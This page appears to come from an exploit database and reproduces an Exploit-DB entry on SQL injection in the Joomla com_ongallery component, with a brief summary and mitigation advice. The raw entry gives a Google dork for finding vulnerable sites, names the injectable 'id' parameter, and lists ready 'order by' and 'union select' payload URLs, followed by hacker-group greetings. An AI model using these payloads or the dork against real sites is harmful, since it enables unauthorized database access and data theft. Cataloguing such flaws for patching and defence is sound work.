header-logo
Suggest Exploit
vendor:
N/A
by:
_aL_Bayraqim_
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component (com_ongallery) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'id' in the URL. This can be done by appending a malicious SQL query to the vulnerable parameter 'id' in the URL. For example, http://site.com/index.php?option=com_ongallery&task=ft&id=-1+order+by+1-- or http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1--

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

 
=================================================== 
Joomla Component (com_ongallery) SQL Injection Vulnerability 
=================================================== 
  
Author :   _aL_Bayraqim_  
  
Homepage : http://www.1923turk.com
 
BORDO BERELİLER GRUP KOMUTANLIGI

..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!...!..KaraBulut....!..!...Ramses....!....!...Mü cahit...!
  
=================================================== 
  [+]G00gle Dork :index.php?option=com_ongallery
  
[+] Vulnerable File :
  
  
http://site.com/index.php?option=com_ongallery&task=ft&id=-1[SQL] 
  
  
[+] ExploiT : 
  
http://site.com/index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
 
http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- 
  
  
=================================================== 
ŞeHiT GeLdi ÖLümLü YaLan, GiTTi ÖLümSüzLügü GerÇek. Siz HaYaT SüRen LeşLer, SiZi Kim DiRiLTecek?..
=================================================== 
  
Greetz : 1923Turk All Users

Navigation

Suggest Exploit

Services By CQR